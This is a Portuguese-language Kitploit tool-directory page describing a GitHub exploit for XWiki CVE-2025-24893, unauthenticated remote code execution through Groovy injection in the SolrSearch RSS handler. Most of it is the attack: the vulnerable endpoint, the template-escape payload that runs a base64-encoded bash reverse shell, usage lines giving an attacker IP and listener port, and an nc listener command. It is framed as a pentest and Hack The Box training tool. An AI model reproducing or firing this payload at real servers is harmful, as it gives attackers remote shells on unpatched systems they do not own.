Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
xwiki-cve-2025-24893-exploit — Exploit RCE não autenticado para XWiki CVE-2025-24893 via injeção de script Groovy | Kitploit
Ferramentas/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

Exploit RCE não autenticado para XWiki CVE-2025-24893 via injeção de script Groovy

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
há 8 mesesAinda não revisado
Compartilhar

Exploit XWiki CVE-2025-24893

Exploit de Execução Remota de Código não autenticada para versões do XWiki vulneráveis ao CVE-2025-24893.

Visão Geral da Vulnerabilidade

Versões do XWiki anteriores a 15.10.9 são vulneráveis a RCE não autenticada através de injeção de script Groovy no manipulador de feed RSS do SolrSearch. A vulnerabilidade existe porque o XWiki não sanitiza adequadamente a entrada do usuário no parâmetro text, permitindo que atacantes saiam do contexto RSS e injetem código Groovy arbitrário.

ID CVE: CVE-2025-24893
Pontuação CVSS: 9.8 (Crítico)
Versões Afetadas: XWiki < 15.10.9

Funcionalidades

  • Interface de linha de comando simples
  • Geração e codificação automática de payload
  • Reverse shell codificado em Base64 para contornar filtros básicos
  • Dependências mínimas (apenas biblioteca requests)

Requisitos

root@kitploit:~
pip3 install requests

Uso

root@kitploit:~
python3 exploit.py <url_alvo> <ip_atacante> <porta_ouvinte>

Exemplo:

root@kitploit:~
# Iniciar ouvinte na máquina atacante
nc -lvnp 9001

# Executar exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

Como Funciona

  1. Constrói um comando bash reverse shell
  2. Codifica o payload em Base64
  3. Envolve-o em código Groovy usando injeção de template (}}}}}}{{{{groovy}}}})
  4. Codifica o payload em URL preservando os delimitadores necessários
  5. Envia requisição GET para /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>
  6. O XWiki processa o feed RSS malicioso e executa o código Groovy

Prova de Conceito

O exploit tem como alvo o seguinte endpoint:

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

A vulnerabilidade permite sair do contexto do feed RSS:

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<payload_base64>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

Aviso Legal

Esta ferramenta é apenas para fins educacionais e de teste de penetração autorizado. O autor não é responsável por qualquer uso indevido ou danos causados por este programa. Utilize este exploit apenas contra sistemas que você possui ou possui permissão explícita para testar.

Referências

  • Aviso de Segurança do XWiki
  • CVE-2025-24893

Licença

Licença MIT - Consulte o arquivo LICENSE para detalhes

Autor

Criado para a máquina HTB "Editor"


Nota: Sempre garanta que você tenha autorização adequada antes de testar qualquer sistema.

Baixar ferramenta